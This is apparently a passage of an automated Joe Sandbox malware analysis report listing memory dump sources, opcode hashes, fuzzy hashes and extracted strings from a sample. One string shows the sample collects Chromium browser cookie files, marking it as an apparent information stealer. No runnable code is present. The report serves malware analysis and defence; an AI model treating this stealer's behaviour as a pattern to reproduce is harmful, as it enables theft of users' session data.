                                                      • Opcode ID: 90341aa79692e7db31999afe92fd30e98e412afa771c2c7ccbf0222e1498820c
                                                      • Instruction ID: 07362335be1b0eeb15e350c7f2de93764b50adacd10a61d4812a8acd1b76fb01
                                                      • Opcode Fuzzy Hash: 90341aa79692e7db31999afe92fd30e98e412afa771c2c7ccbf0222e1498820c
                                                      • Instruction Fuzzy Hash: B91226B0A00309AFE7109F65DC45727BBE5AF40344F1D443AEE9A87392EB35EA04DB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @5O7$X1S3$o=_?$pAuC$tEDG
                                                      • API String ID: 0-858526541
                                                      • Opcode ID: 1c0a9a9fb3d2f08a7b012cd42b183afbad184beac71f3485575748b2191c0e8e
                                                      • Instruction ID: d1abb0b17009463562352efd834b6aea15080404115e7dd6410f6398d8e25dce
                                                      • Opcode Fuzzy Hash: 1c0a9a9fb3d2f08a7b012cd42b183afbad184beac71f3485575748b2191c0e8e
                                                      • Instruction Fuzzy Hash: D96153B0205B42AFE328DF25C890795FBA2FB52704F148A0DC1AA5BB45C734A466CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$8
                                                      • API String ID: 0-46163386
                                                      • Opcode ID: f4c51b98f57c86357580e9f3c4a7c92e5af74c5c2bb1402812c91b9d9baf38be
                                                      • Instruction ID: 62f1bf99634374f1d3b91c8df0b81f5040276598a12444157a0afd362453f7f5
                                                      • Opcode Fuzzy Hash: f4c51b98f57c86357580e9f3c4a7c92e5af74c5c2bb1402812c91b9d9baf38be
                                                      • Instruction Fuzzy Hash: 10728B716087409FD714CF18C880B9BBBE2BF98354F18892EFA998B391D775D944CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: R-,T$R-,T
                                                      • API String ID: 0-2000385741
                                                      • Opcode ID: aed3bdc39fe07416ae429a3a9a4b022df6f0cf4605655bb5f18c7bf831026384
                                                      • Instruction ID: 8cbdfe08c35ecfcb5be962b663af2d37eb32611e302a128b2772a1d0f20d3cf3
                                                      • Opcode Fuzzy Hash: aed3bdc39fe07416ae429a3a9a4b022df6f0cf4605655bb5f18c7bf831026384
                                                      • Instruction Fuzzy Hash: 3EA19CB1A043129BD714CF18C4A076AF7E1FF88724F198A1CE8999B392D734EC51CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$Z%_#
                                                      • API String ID: 0-3398817662
                                                      • Opcode ID: c3baa8916274a5841e492b99ba528c07f386ec5633c647d30634eb3688be5be9
                                                      • Instruction ID: 62f609fc70e746b345a46b2e25bcbd846701a8a3daef2f7738be1a928a1c9531
                                                      • Opcode Fuzzy Hash: c3baa8916274a5841e492b99ba528c07f386ec5633c647d30634eb3688be5be9
                                                      • Instruction Fuzzy Hash: E06100B0101B819BE3258F21D8A97E7BBE1FF46348F54491CC1EB4B281D7B62249CF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0m=s$@
                                                      • API String ID: 0-131613617
                                                      • Opcode ID: 3919ae6cc5dcc2c50f2f1905f4b51ed0374b77d12d260e852d935e42c85a9952
                                                      • Instruction ID: eeec6e9625b864b640ef7a7d8168562110ca8d342624e0654011d043088b6232
                                                      • Opcode Fuzzy Hash: 3919ae6cc5dcc2c50f2f1905f4b51ed0374b77d12d260e852d935e42c85a9952
                                                      • Instruction Fuzzy Hash: 2C3143B05183408BD724CF18D89076BBBF0FF86348F54080DE8859B394E379C989CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ))+
                                                      • API String ID: 0-2264702822
                                                      • Opcode ID: 860a2a15e44d56225d97d70414f4fd3c381e72bb2993da1c88372f26bfee7dfd
                                                      • Instruction ID: 9bc58bdba52e697012d63d2c1379d5eb7825131564a6654b56748984d08f20a5
                                                      • Opcode Fuzzy Hash: 860a2a15e44d56225d97d70414f4fd3c381e72bb2993da1c88372f26bfee7dfd
                                                      • Instruction Fuzzy Hash: F552DD70100B418BD369CF29C494772BBE2BF46304F588A6DD2E78BB92C735E506CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 80a18491117150d333441df3bff268fad76f51a6498208e97f7ba7341a4a6845
                                                      • Instruction ID: 31f4b42a891c7f00e5ceb8a37fb97c869ad2a855647614e5f36cc38270351992
                                                      • Opcode Fuzzy Hash: 80a18491117150d333441df3bff268fad76f51a6498208e97f7ba7341a4a6845
                                                      • Instruction Fuzzy Hash: 0E120570508780ABE7248E26C09436BBBE29FD2310F1CC91FDAE5477D6D278DA89D752
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d!`#
                                                      • API String ID: 0-1796573514
                                                      • Opcode ID: 5854448fd1c6f27d7c1b5423262d560628bf161d19940b0da311fe20a0852a03
                                                      • Instruction ID: dc7c2be6028b3fbdb386246ae92988a9cbf12b9e2924e5748d9080cc3330791c
                                                      • Opcode Fuzzy Hash: 5854448fd1c6f27d7c1b5423262d560628bf161d19940b0da311fe20a0852a03
                                                      • Instruction Fuzzy Hash: 8FC1AA752107018BD728CF29C8A1763B3B2FF9A314F19861CD8968B795E734F945CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: onqp
                                                      • API String ID: 0-1718216680
                                                      • Opcode ID: f05e4dd1beb44c64f574916bb911bd6be1fea9af9921a6774c8c777cbf9fe470
                                                      • Instruction ID: 4e5ee7141e5ef6e6771ffec8c175dad17056827507505f6d59ac1ce4b2003fa2
                                                      • Opcode Fuzzy Hash: f05e4dd1beb44c64f574916bb911bd6be1fea9af9921a6774c8c777cbf9fe470
                                                      • Instruction Fuzzy Hash: 8C81F1B19043419FD714DF15C8A2B7BB3B5EF91324F1A4528E8965B392E374EE01CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'QRS
                                                      • API String ID: 0-187708292
                                                      • Opcode ID: ae6ee3a89638a7fdb7e706c294a482b01831678f2332d072d8f8bd03641aa3c9
                                                      • Instruction ID: f2807501b97c5aa649b7d3f85f9da8cb5a7dbddb2c54a41662e3d738cde42781
                                                      • Opcode Fuzzy Hash: ae6ee3a89638a7fdb7e706c294a482b01831678f2332d072d8f8bd03641aa3c9
                                                      • Instruction Fuzzy Hash: 0D71C0B15042508FDB24DF19C892A7773B1EF96324F1A855CE8A24B3D1E775EE01C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,
                                                      • API String ID: 0-3772416878
                                                      • Opcode ID: 4303eaba738641e0dfd53d6692d663189ecfa2db0f3afb9ea794ddc93ded9011
                                                      • Instruction ID: ae25b3e3f946e7106915c3670f1bdf320ad533289cfedd54f7bc8f045f61be73
                                                      • Opcode Fuzzy Hash: 4303eaba738641e0dfd53d6692d663189ecfa2db0f3afb9ea794ddc93ded9011
                                                      • Instruction Fuzzy Hash: 51B12971509381AFD314CF68C88475BFBE0AFA9304F444A5EF59897382C775DA28CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • [info] collected cookies file of the chromium-based browser, xrefs: 00CE3D16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [info] collected cookies file of the chromium-based browser
                                                      • API String ID: 0-3235166063
                                                      • Opcode ID: 4b030052947b6bc1495ac5410084f5d27160b81704d7acb0aa25d2d5d2846f49
                                                      • Instruction ID: 0ee472b82a7824b8134936ccc244b11a9a1796c07edd56a83676ba1ed429f610
                                                      • Opcode Fuzzy Hash: 4b030052947b6bc1495ac5410084f5d27160b81704d7acb0aa25d2d5d2846f49
                                                      • Instruction Fuzzy Hash: 1A412A30115B80CAE329CB34C895BEBB7B2BB45305F845A1DD0AB872C2DBB57606CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 078ab5e1384abebf0a1c9e083fa75fb9870894a45fffc8b676864af510a6ad83
                                                      • Instruction ID: fd9a39f960df49744c22bfc141bc2535f54847b455de09c9d010f6a60b2b27d7
                                                      • Opcode Fuzzy Hash: 078ab5e1384abebf0a1c9e083fa75fb9870894a45fffc8b676864af510a6ad83
                                                      • Instruction Fuzzy Hash: B45219315087128BC725DF18D88027AB3E1FFD4314F158A2EDAD697395EB34E95ACB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8facecfddd720ccdbfbc9918caefa5a5285e746b6a581131517add8d49c9d3ba
                                                      • Instruction ID: 6346bf75a8edc33b33c8ad3b4a5f230995e6bd6948c6efbe9bb0d5fda9048fca
                                                      • Opcode Fuzzy Hash: 8facecfddd720ccdbfbc9918caefa5a5285e746b6a581131517add8d49c9d3ba
                                                      • Instruction Fuzzy Hash: D562B1756083828FC715CF19C09066AF7E1FF98314F188A6EE5D95B342D735EA86CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fbadb86533b92b6c1da7bbf8420aa00128589d8fe953a65431e78cf9948a0e0
                                                      • Instruction ID: 5fef9d3a03a8acb627515153ad7cab5f76adb44de20afd575bc80da0cda50102
                                                      • Opcode Fuzzy Hash: 9fbadb86533b92b6c1da7bbf8420aa00128589d8fe953a65431e78cf9948a0e0
                                                      • Instruction Fuzzy Hash: 45327EB46083428FD714CF18C490B2EBBE6BBD5318F188A1CE6E58B391D775D945CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e255447c867dc1147f89e8f1addb9dd2c3405d957fb2e4fdaad16ce998b72057
                                                      • Instruction ID: 0ce2779302e7cce430405637fe2d8f8675168751adffd5755e15f70eb44afa97
                                                      • Opcode Fuzzy Hash: e255447c867dc1147f89e8f1addb9dd2c3405d957fb2e4fdaad16ce998b72057
                                                      • Instruction Fuzzy Hash: 5F423470514B518FC768CF29C58066ABBF1FF95310BA08A2EE6A78BB90D735F945CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9ad6f4e45c733b248760025bc0fe85913c8321502d9534f3386eb258ffc1704
                                                      • Instruction ID: 0d036fb0abc97ba63b2468b69c45db6797486f43cabebca2618420f04637e5a5
                                                      • Opcode Fuzzy Hash: d9ad6f4e45c733b248760025bc0fe85913c8321502d9534f3386eb258ffc1704
                                                      • Instruction Fuzzy Hash: 1B02A4356083408FDB14CF19C88076BFBE2AFC9304F09856EF9898B356EA75D945CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
